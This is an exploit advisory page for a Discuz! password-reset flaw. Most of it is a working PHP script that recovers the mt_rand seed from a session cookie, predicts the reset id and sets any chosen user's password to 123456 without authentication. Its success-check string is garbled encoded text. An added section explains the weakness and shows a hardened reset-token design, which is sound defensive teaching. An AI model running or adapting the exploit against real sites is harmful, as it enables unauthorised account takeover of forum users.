Discuz! Remote Reset User Password Exploit

2009.08.14
Credit: 80vul
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Discuz! Reset User Password Exploit
by 80vul team: http://www.80vul.com
+---------------------------------------------------------------------------+
');

if ($argc < 6) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user mail uid
host: target server (ip/hostname)
path: path to discuz
user: user login name
mail: user login mail
uid:  user login id
Example:
php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$mail = $argv[4];
$uid  = $argv[5];

// Step 1: fetch viewthread.php and pull the 8-character formhash out of the HTML
$fp = fsockopen($host, 80);
$data  = "GET ".$path."viewthread.php HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Keep-Alive: 300\r\n";
$data .= "Connection: keep-alive\r\n\r\n";
fputs($fp, $data);

$resp = '';
while ($fp && !feof($fp)) {
    $resp .= fread($fp, 1024);
    preg_match('/&amp;formhash=([a-z0-9]{8})/', $resp, $hash);
    if ($hash) break;
}

if ($hash) {
    // Step 2: submit the lost-password form; the response sets a 6-character *_sid cookie
    $cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
    $data  = "POST ".$path."member.php HTTP/1.1\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Referer: http://$host$path\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: close\r\n\r\n";
    $data .= $cmd;
    fputs($fp, $data);

    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    fclose($fp);

    preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
    if (!$sid) exit("Exploit Failed!\n");

    // Step 3: the sid and the reset id come from the same mt_rand() stream.
    // Recover the seed from the sid, then replay the generator to obtain the reset id.
    $seed = getseed();
    if ($seed) {
        mt_srand($seed);
        random();
        mt_rand();
        $id = random();

        // Step 4: submit the reset form with the predicted id and a new password
        $fp = fsockopen($host, 80);
        $cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
        $data  = "POST ".$path."member.php HTTP/1.1\r\n";
        $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $data .= "Referer: http://$host$path\r\n";
        $data .= "Host: $host\r\n";
        $data .= "Content-Length: ".strlen($cmd)."\r\n";
        $data .= "Connection: close\r\n\r\n";
        $data .= $cmd;
        fputs($fp, $data);

        $resp = '';
        while ($fp && !feof($fp)) $resp .= fread($fp, 1024);

        // The success check looks for Discuz!'s Chinese "password set" message;
        // the string below is reproduced exactly as it appears on this page (entity-encoded).
        if (strpos($resp, '&#230;&#65533;&#65533;&#65533;&#229;&#175;&#65533;&#65533;&#229;&#183;&#178;&#65533;&#65533;&#230;&#65533;&#232;&#174;&#190;&#189;&#174;&#239;&#188;&#65533;&#232;&#175;&#183;&#189;&#191;&#65533;&#230;&#65533;&#229;&#175;&#65533;&#65533;&#65533;&#187;&#229;&#189;&#65533;&#227;&#65533;&#65533;') !== false)
            exit("Exploit Success!\nUser New Password:\t123456\n");
        else
            exit("Exploit Failed!\n");
    } else {
        exit("Exploit Failed!\n");
    }
} else {
    exit("Exploit Failed!\n");
}

// Brute-force the mt_srand() seed that reproduces the observed sid (seeds 0..1000000)
function getseed() {
    global $sid;
    for ($seed = 0; $seed <= 1000000; $seed++) {
        mt_srand($seed);
        $id = random(6);
        if ($id == $sid[1]) return $seed;
    }
    return false;
}

// Same alphabet and construction Discuz! uses for its random ids
function random($length = 6) {
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)];
    return $hash;
}
?>
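The weakness the exploit above depends on is a reset id drawn from mt_rand() after mt_srand() with a small seed, with the same generator stream also producing the session id that the server hands back in a cookie. Anyone who sees the sid can brute-force the seed and replay the stream. The PHP below is an added example, not part of the advisory or of Discuz! itself: it places that weak, seedable pattern next to a reset token drawn from the CSPRNG, stored only as a hash with an expiry, and checked in constant time. The record layout and function names are my own assumptions for illustration.

```php
<?php
// Added example (not the advisory's or Discuz!'s code).

// Weak pattern, as in the advisory: output is fully determined by a small
// seed, and the same stream feeds both the sid and the reset id.
function weak_reset_id(int $seed, int $length = 6): string {
    mt_srand($seed);
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    $id = '';
    for ($i = 0; $i < $length; $i++) $id .= $chars[mt_rand(0, $max)];
    return $id;
}

// Hardened: 256 bits from the OS CSPRNG. There is no seed to recover and no
// shared stream to replay, and the space is far too large to guess online.
function secure_reset_token(): string {
    return bin2hex(random_bytes(32));
}

// Store only a hash of the token plus an expiry (hypothetical record shape),
// so a leaked database row does not yield a usable reset link.
function make_reset_record(int $uid, int $ttl_seconds = 900): array {
    $token = secure_reset_token();
    return [
        'token_for_email' => $token,          // goes to the user's mailbox only
        'record' => [
            'uid'     => $uid,
            'hash'    => hash('sha256', $token),
            'expires' => time() + $ttl_seconds,
            'used'    => false,
        ],
    ];
}

// Verify: bind to the uid, enforce expiry and single use, compare hashes in
// constant time. Marks the record used on success.
function verify_reset_token(array &$record, int $uid, string $presented, int $now): bool {
    if ($record['used'] || $record['uid'] !== $uid) return false;
    if ($now > $record['expires']) return false;
    if (!hash_equals($record['hash'], hash('sha256', $presented))) return false;
    $record['used'] = true;
    return true;
}

// Demonstration of the difference.
echo weak_reset_id(12345) === weak_reset_id(12345)
    ? "weak id: identical on every run for the same seed\n"
    : "weak id: unexpected\n";

$r = make_reset_record(2);
$rec = $r['record'];
echo verify_reset_token($rec, 2, $r['token_for_email'], time())        ? "secure: valid token accepted\n"   : "secure: unexpected reject\n";
echo verify_reset_token($rec, 2, $r['token_for_email'], time())        ? "secure: unexpected reuse\n"       : "secure: reuse rejected\n";
$rec2 = make_reset_record(2)['record'];
echo verify_reset_token($rec2, 2, 'not-the-token', time())             ? "secure: unexpected accept\n"      : "secure: wrong token rejected\n";
echo verify_reset_token($rec2, 2, $r['token_for_email'], time() + 3600) ? "secure: unexpected accept\n"     : "secure: stale/mismatched token rejected\n";
```

The point of keeping the weak function alongside the fix is that the alphabet and length were never the problem; 62^6 possibilities would be fine against online guessing. What breaks it is that the value is a deterministic function of a seed the attacker can recover from another observable output of the same generator, which random_bytes() removes entirely.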

References:

http://xforce.iss.net/xforce/xfdb/46785
http://www.securityfocus.com/bid/32424
http://www.milw0rm.com/exploits/7185
http://www.discuz.net/archiver/?tid-1112426.html
http://www.80vul.com/dzvul/sodb/14/dz-exp-sodb-2008-14_php.htm
http://secunia.com/advisories/32731


Copyright 2024, cxsecurity.com
